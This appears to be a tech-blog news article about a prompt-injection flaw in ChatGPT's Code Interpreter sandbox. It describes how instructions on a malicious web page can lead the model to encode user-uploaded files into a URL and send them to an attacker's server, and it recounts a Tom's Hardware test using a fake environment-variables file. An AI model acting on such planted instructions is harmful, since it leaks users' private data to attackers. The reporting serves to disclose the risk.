Scroll Top

OpenAI’s latest updates introduce a huge new security risk

WHY THIS MATTERS IN BRIEF

By being able to call and interact with third party systems, AI’s, apps, scripts, websites, and more hackers have found a new way to hack “everything.”

 

Love the Exponential Future? Join our XPotential Community, future proof yourself with courses from XPotential University, read about exponential tech and trendsconnect, watch a keynote, or browse my blog.

OpenAI’s recent update to ChatGPT Plus added a myriad of new features, including DALL-E image generation and the Code Interpreter, which allows Python code execution and file analysis. The code is created and run in a sandbox environment that is unfortunately vulnerable to prompt injection attacks.

 

RELATED
Two algorithms left to their own devices ended up colluding with one another

 

A known vulnerability in ChatGPT for some time now, the attack involves tricking ChatGPT into executing instructions from a third-party URL, leading it to encode uploaded files into a URL-friendly string and send this data to a malicious website. While the likelihood of such an attack requires specific conditions, for example, the user must actively paste a malicious URL into ChatGPT, the risk remains concerning. This security threat could be realized through various scenarios, including a trusted website being compromised with a malicious prompt — or through social engineering tactics.

 

The Future of Cyber Security 2030, by Keynote Matthew Griffin

 

Tom’s Hardware did some impressive work testing just how vulnerable users may be to this attack. The exploit was tested by creating a fake environment variables file and using ChatGPT to process and inadvertently send this data to an external server.

 

RELATED
Doctors get a powerful new AI tool to help them diagnose ADHD faster

 

Although the exploit’s effectiveness varied across sessions, E.G.: ChatGPT sometimes refused to load external pages or transmit file data, it raises significant security concerns, especially given the AI’s ability to read and execute Linux commands and handle user-uploaded files in a Linux-based virtual environment.

 

As Tom’s Hardware states in its findings, despite seeming unlikely, the existence of this security loophole is significant. ChatGPT should ideally not execute instructions from external web pages, yet it does.

Related Posts

Leave a comment

EXPLORE MORE!

1000's of articles about the exponential future, 1000's of pages of insights, 1000's of videos, and 100's of exponential technologies: Get The Email from 311, your no-nonsense briefing on all the biggest stories in exponential technology and science.

You have Successfully Subscribed!

Pin It on Pinterest

Share This